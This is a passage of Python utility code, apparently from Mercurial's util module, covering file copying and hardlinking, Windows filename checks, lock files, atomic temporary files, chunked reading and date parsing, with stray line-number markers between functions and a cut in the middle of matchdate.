    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # recreate the symlink itself instead of copying its target
        os.symlink(os.readlink(src), dest)
        # copystat is ignored for symlinks, but in general copystat isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        # so push mtime one second past the old one (masked
                        # to 31 bits)
                        advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1257 1257
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a file or directory tree, hardlinking when possible.

    When hardlink is None, linking is attempted only if source and
    destination are on the same device. progress(topic, pos) is called
    after each file and once more with pos=None at the end.

    Returns a (hardlink, num) tuple: whether hardlinking is still in use
    and how many files were processed.
    """
    num = 0

    def gettopic():
        return hardlink and _('linking') or _('copying')

    def nprog(t, pos):
        # offset nested progress by the files already handled here
        if pos is not None:
            return progress(t, pos + num)

    if not os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        linked = False
        if hardlink:
            try:
                oslink(src, dst)
                linked = True
            except (IOError, OSError):
                # stop trying to link for the rest of the copy
                hardlink = False
        if not linked:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    else:
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            hardlink, n = copyfiles(os.path.join(src, name),
                                    os.path.join(dst, name),
                                    hardlink, progress=nprog)
            num += n
    progress(topic, None)

    return hardlink, num
1297 1297
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5',
    'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5',
    'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'

def checkwinfilename(path):
    r'''Validate a base-relative path against Windows filename rules.

    Returns None when every component is acceptable, otherwise a UI
    string describing the first problem found.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    components = path.replace('\\', '/').split('/')
    for comp in components:
        if not comp:
            continue
        for ch in _filenamebytestr(comp):
            if ch in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % ch
            if ord(ch) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(ch)
        # only the part before the first dot counts for reserved names
        stem = comp.split('.')[0]
        if stem and stem.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % stem
        last = comp[-1:]
        # "comp not in '..'" exempts the '.' and '..' components
        if last in '. ' and comp not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % last
1350 1350
# Pick the platform-specific filename checker and the best available timer.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    # time.clock was removed in Python 3.8; looking it up unconditionally
    # would make importing this module fail there, so fall back to
    # time.time when it is missing.
    timer = getattr(time, 'clock', time.time)
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# perf_counter, where available, takes precedence on every platform
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1360 1360
def makelock(info, pathname):
    """Create a lock at pathname holding info.

    A symlink whose target is info is tried first. If symlinks are
    unavailable, or creating one fails for a reason other than the lock
    already existing, a regular file is created exclusively and info is
    written into it.

    Raises OSError (EEXIST in particular) if the lock cannot be created.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    # O_BINARY only exists on Windows; it keeps the lock content from
    # going through text-mode translation there.
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    try:
        os.write(ld, info)
    finally:
        # never leak the descriptor, even when the write fails
        os.close(ld)
1373 1373
def readlock(pathname):
    """Return the info stored in the lock at pathname.

    The lock is read as a symlink target when possible. If pathname is not
    a symlink (EINVAL), or symlinks are unsupported (ENOSYS, or os has no
    readlink), the content of the regular file is returned instead.

    Other OSErrors from readlink are propagated.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    try:
        return fp.read()
    finally:
        # close the handle even if read() raises
        fp.close()
1386 1386
def fstat(fp):
    '''Stat a file object, falling back to its name if it has no fileno.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        return os.stat(fp.name)
    return os.fstat(fd)
1393 1393
1394 1394 # File system features
1395 1395
def fscasesensitive(path):
    """
    Report whether the filesystem holding path is case-sensitive.

    The final component of path (e.g. the '.hg' in /foo/.hg) must exist
    and should contain letters whose case can be changed; if it does not,
    True is returned because nothing contradicts case sensitivity.
    """
    st = os.lstat(path)
    parent, leaf = os.path.split(path)
    folded = leaf.upper()
    if folded == leaf:
        folded = leaf.lower()
        if folded == leaf:
            return True # no evidence against case sensitivity
    try:
        other = os.lstat(os.path.join(parent, folded))
    except OSError:
        # the case-folded name does not exist: case matters
        return True
    # identical stat results mean both spellings reach the same file
    return not (other == st)
1418 1418
# _re2 is None while re2 is importable but untested, False when unavailable
try:
    import re2
except ImportError:
    _re2 = False
else:
    _re2 = None
1424 1424
class _re(object):
    '''Regular expression front end that uses re2 when it is usable.'''

    def _checkre2(self):
        '''Set the module-level _re2 flag by probing re2 once.'''
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        supported = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not (flags & ~supported):
            # re2 takes no flags argument here; express them inline
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern not supported by re2: use the stdlib below
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if not _re2:
            return remod.escape
        return re2.escape

re = _re()
1469 1469
# maps a directory to a {normcased name: on-disk name} dict of its entries
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.

    Returns name with each component replaced by its on-disk spelling;
    components that cannot be found are kept as given.
    '''
    def _makefspathcacheentry(dir):
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # Strings are immutable, so the result must be assigned back;
    # otherwise a backslash separator would merely escape the next
    # character inside the regex character class below.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1512 1512
def getfstype(dirpath):
    '''Return the filesystem type name for a directory (best-effort).

    Returns None if we are unsure, including when osutil provides no
    getfstype. Raises OSError on ENOENT, EPERM, etc.
    '''
    try:
        probe = osutil.getfstype
    except AttributeError:
        return None
    return probe(dirpath)
1519 1519
def checknlink(testfile):
    '''Report whether hardlink counts are reliable next to testfile.

    Two temporary files are created in testfile's directory, one linked to
    the other; True is returned if the link count then exceeds one. Any
    OSError along the way yields False.
    '''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    first = second = handle = None
    try:
        fd, first = tempfile.mkstemp(
            prefix='.%s-' % os.path.basename(testfile),
            suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        second = '%s2~' % first[:-2]

        oslink(first, second)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        handle = posixfile(second)
        return nlinks(second) > 1
    except OSError:
        return False
    finally:
        if handle is not None:
            handle.close()
        for leftover in (first, second):
            if leftover is None:
                continue
            try:
                os.unlink(leftover)
            except OSError:
                pass
1548 1548
def endswithsep(path):
    '''Tell whether path ends with os.sep or, if defined, os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1553 1553
def splitpath(path):
    '''Split path into its components on os.sep.

    os.altsep is deliberately not considered: this is meant as a drop-in
    for a plain "xxx.split(os.sep)". Run os.path.normpath() on the path
    first if needed.'''
    separator = pycompat.ossep
    return path.split(separator)
1561 1561
def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform != 'darwin':
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
1576 1576
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The temporary file is created next to name. The permission bits are
    copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization; nothing is copied then. If
    name does not exist, the (empty) temporary file is returned as well.

    Returns the name of the temporary file. On any error while copying,
    the temporary file is removed and the error is re-raised.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        # Close both files even when the copy fails: a handle left open
        # would leak and, on Windows, keep the cleanup below from removing
        # the temporary file.
        try:
            ofp = posixfile(temp, "wb")
            try:
                for chunk in filechunkiter(ifp):
                    ofp.write(chunk)
            finally:
                ofp.close()
        finally:
            ifp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1617 1617
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; 'stat' is None if path is missing.

        OSErrors other than ENOENT are propagated.
        """
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object having fileno()."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            # at least one side has no stat (or is not a filestat)
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.

        Returns False if either side has no stat.
        """
        try:
            # Ambiguity is defined at one-second granularity, so compare
            # whole seconds even where st_ctime is a float.
            return int(self.stat.st_ctime) == int(old.stat.st_ctime)
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # st_mtime may be a float, which cannot be masked with '&';
        # truncate it to whole seconds first.
        advanced = (int(old.stat.st_mtime) + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
1719 1719
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).

    Used as a context manager, the file is closed (committed) on normal
    exit and discarded if the block raises.
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name      # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        '''Commit the writes by renaming the temporary file into place.'''
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # the old stat must be taken before the rename replaces the file
            oldstat = self._checkambig and filestat.frompath(filename)
            rename(self._tempname, filename)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one.
                    # st_mtime may be a float, which cannot be masked
                    # with '&', so truncate it to whole seconds first.
                    advanced = (int(oldstat.stat.st_mtime) + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))

    def discard(self):
        '''Drop the writes: remove the temporary file and close it.'''
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()
1782 1782
def unlinkpath(f, ignoremissing=False):
    """Remove file f, then prune parent directories left empty.

    With ignoremissing, removal goes through tryunlink() instead of
    unlink().
    """
    remover = tryunlink if ignoremissing else unlink
    remover(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1794 1794
def tryunlink(f):
    """Remove file f; a missing file (ENOENT) is not an error."""
    try:
        unlink(f)
    except OSError as inst:
        if inst.errno == errno.ENOENT:
            return
        raise
1802 1802
def makedirs(name, mode=None, notindexed=False):
    """Create directory name, creating missing parents recursively.

    ``mode``, when given, is applied with chmod to every directory this
    call creates. Nothing is changed if name already exists.

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as inst:
        code = inst.errno
        if code == errno.EEXIST:
            return
        if not name or code != errno.ENOENT:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the top without being able to create anything
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as race:
            # Catch EEXIST to handle races
            if race.errno != errno.EEXIST:
                raise
            return
    if mode is not None:
        os.chmod(name, mode)
1830 1830
def readfile(path):
    """Return the whole content of path, read in binary mode."""
    with open(path, 'rb') as source:
        content = source.read()
    return content
1834 1834
def writefile(path, text):
    """Replace the content of path with text, written in binary mode."""
    with open(path, 'wb') as target:
        target.write(text)
1838 1838
def appendfile(path, text):
    """Append text to path, written in binary mode."""
    with open(path, 'ab') as target:
        target.write(text)
1842 1842
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # break chunks larger than 1MB into 256kB pieces
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # chunks fetched from the iterator but not fully consumed yet
        self._queue = collections.deque()
        # how much of self._queue[0] has already been returned
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            # "everything" includes what an earlier sized read() already
            # pulled from the iterator into the queue but did not return.
            queue = self._queue
            pending = []
            if queue:
                pending.append(queue.popleft()[self._chunkoffset:])
                self._chunkoffset = 0
                pending.extend(queue)
                queue.clear()
            pending.extend(self.iter)
            return ''.join(pending)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # left becomes negative here, which ends the loop
                left -= chunkremaining

        return ''.join(buf)
1922 1922
def filechunkiter(f, size=131072, limit=None):
    """Yield the data of file f in pieces of at most size bytes
    (default 131072), stopping after limit bytes when a limit is given
    (default is to read all data). A piece may be shorter than size if
    it is the last one in the file, or if the file is a socket or some
    other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    remaining = limit
    while True:
        wanted = size if remaining is None else min(remaining, size)
        if not wanted:
            # zero size, or the limit has been used up
            break
        data = f.read(wanted)
        if not data:
            break
        if remaining:
            remaining -= len(data)
        yield data
1943 1943
def makedate(timestamp=None):
    '''Return a (unixtime, offset) tuple for a unix timestamp, or for the
    current time if none is given. The offset is the local timezone's
    distance from UTC in seconds at that time.

    Aborts on a negative timestamp.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    asutc = datetime.datetime.utcfromtimestamp(timestamp)
    aslocal = datetime.datetime.fromtimestamp(timestamp)
    delta = asutc - aslocal
    return timestamp, delta.days * 86400 + delta.seconds
1956 1956
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """Format a (unixtime, offset) tuple as a localized time string.

    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC. Without a date, the current time is
    used. In format, "%1" and "%2" stand for the signed hours and the
    minutes of the offset, and "%z" for both.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        sign = "-" if tz > 0 else "+"
        hours, mins = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, hours))
        format = format.replace("%2", "%02d" % mins)
    # clamp the local time to the signed 32-bit range
    d = min(max(t - tz, -0x80000000), 0x7fffffff)
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    when = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(when.strftime(encoding.strfromlocal(format)))
1992 1992
def shortdate(date=None):
    """Format a (timestamp, tzoff) tuple as an ISO 8601 date (YYYY-MM-DD)."""
    isodate = datestr(date, format='%Y-%m-%d')
    return isodate
1996 1996
def parsetimezone(s):
    """Look for a timezone at the end of s.

    Returns an (offset, remainder) pair: the offset in seconds (None if
    no timezone was recognized) and the string without the timezone."""

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        direction = 1 if s[-5] == "+" else -1
        total = int(s[-4:-2]) * 60 + int(s[-2:])
        return -direction * total * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        direction = 1 if s[-6] == "+" else -1
        total = int(s[-5:-3]) * 60 + int(s[-2:])
        return -direction * total * 60, s[:-6]

    return None, s
2024 2024
def strdate(string, format, defaults=None):
    """Parse a localized time string according to format.

    Returns a (unixtime, offset) tuple. Elements missing from format are
    taken from defaults, which maps each part name to a (biased, now)
    pair. ValueError is raised if the string cannot be parsed."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        if any(("%" + p) in format for p in part):
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True
        else:
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is not None:
        unixtime = localunixtime + offset
    else:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    return unixtime, offset
2057 2057
def parsedate(date, formats=None, bias=None):
    """Parse a localized date/time into a (unixtime, offset) tuple.

    ``date`` may be a "unixtime offset" string, one of the keywords
    'now', 'today' or 'yesterday' (or their translations), or a string in
    one of ``formats`` (``defaultdateformats`` when none are given). A
    2-tuple is returned unchanged and an empty value yields ``(0, 0)``.

    ``bias`` maps a date part key ('d', 'mb', 'yY', 'HI', 'M', 'S') to the
    string that should stand in for that part when the input omits it.

    Raises error.ParseError if no format matches or if the result is out
    of the accepted range.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...      ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # keyword dates, accepted both untranslated and translated
    if date in ('now', _('now')):
        return makedate()
    if date in ('today', _('today')):
        today = datetime.date.today()
        date = encoding.strtolocal(today.strftime(r'%b %d'))
    elif date in ('yesterday', _('yesterday')):
        yesterday = datetime.date.today() - datetime.timedelta(days=1)
        date = encoding.strtolocal(yesterday.strftime(r'%b %d'))

    try:
        # internal "unixtime offset" form; a wrong field count also
        # surfaces as ValueError from the unpacking
        when, offset = [int(field) for field in date.split(' ')]
    except ValueError:
        # build, for every date part, the pair (biased value, value taken
        # from the current time) that strdate() uses for missing elements
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            key = part[0:1]
            # rounding value for the specific end of unknowns
            biased = bias.get(part)
            if biased is None:
                biased = "00" if key in "HMS" else "0"
            # value matching the generic end to today's date
            current = datestr(now, "%" + key)
            defaults[part] = (biased, current)

        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                continue
            break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if not (-0x80000000 <= when <= 0x7fffffff):
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if not (-50400 <= offset <= 43200):
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2136 2136
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    '-{days}' within the given number of days before now

    '{date} to {date}' a date range, inclusive

    The returned callable takes a unixtime and returns a boolean.

    Raises Abort for an empty or malformed specifier; errors raised by
    parsedate() for unparsable dates propagate to the caller.

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest instant matching a partially specified date
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest instant matching a partially specified date; the last day
        # of the month is unknown, so try from the longest month downwards
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except (Abort, error.ParseError):
                # parsedate() reports an impossible day (e.g. Feb 31) with
                # error.ParseError; catch it as well as Abort so the
                # fallback to a shorter month really happens
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
